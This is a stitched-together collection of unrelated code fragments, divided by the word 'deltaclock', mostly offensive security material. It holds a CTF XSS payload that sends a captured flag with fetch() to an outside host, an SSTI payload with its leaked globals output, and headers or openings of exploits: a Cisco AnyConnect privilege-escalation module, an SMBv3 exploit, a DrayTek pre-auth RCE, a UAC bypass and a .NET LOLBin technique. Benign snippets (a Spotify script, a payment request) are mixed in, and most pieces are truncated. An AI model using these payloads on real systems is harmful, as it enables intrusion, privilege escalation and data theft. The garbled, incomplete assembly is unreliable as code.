deltaclock

<iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>

<script>
window.addEventListener('hashchange', (evt) => {
		const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0]
		fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`)
})
</script>

deltaclock

<#
 .Synopsis
  This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows

 .Description
  This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows.
  When the -Command argument isn't provided a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll.

  This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen.
  Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges.

deltaclock

SSTI

1. Write one comment
2. When writing a comment content, do SSTI to leak author's credentials

{rating[comments][0].__class__.__init__.__globals__}
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/loaddata.py'), '__file__': './app/loaddata.py', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format': 

deltaclock

#!/usr/bin/env ruby

# elisp, lua, python2, and jvm
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/

$flag = File.read('flag').chomp

$ml_preamble = nil
$lua_preamble = nil
$ruby_preamble = nil

deltaclock

var details = {
  displayItems: [
    {
      label: "Original donation amount",
      amount: { currency: "USD", value : "65.00" },
    },
    {
      label: "Friends and family discount",
      amount: { currency: "USD", value : "-10.00" },
      pending: true

deltaclock

#!/usr/bin/env bash

#
# This is sp, the command-line Spotify controller. It talks to a running
# instance of the Spotify Linux client over dbus, providing an interface not
# unlike mpc.
#
# Put differently, it allows you to control Spotify without leaving the comfort
# of your command line, and without a custom client or Premium subscription.
#

deltaclock

#!/usr/bin/env python
import argparse
import string
import sys

from impacket import nmb
from impacket.smb3 import SMB2_COMPRESSION_TRANSFORM_HEADER, SMB3, SMB2_DIALECT_311, SMB2_NEGOTIATE_SIGNING_REQUIRED, \
    SMB2_NEGOTIATE_SIGNING_ENABLED, STATUS_SUCCESS, SMB2_DIALECT_30, \
    SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, SMB2_NEGOTIATE, \
    SMB2Negotiate, SMB311ContextData, SMB2NegotiateContext, SMB2_PREAUTH_INTEGRITY_CAPABILITIES, \

deltaclock

package main


/*
CVE-2020-8515: DrayTek pre-auth remote root RCE

Mon Mar 30 2020 -  0xsha.io


Affected:

deltaclock

# -*- coding: utf-8 -*-
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :))
# This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True.
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum

kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32  = WinDLL('shell32' , use_last_error=True)

deltaclock

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.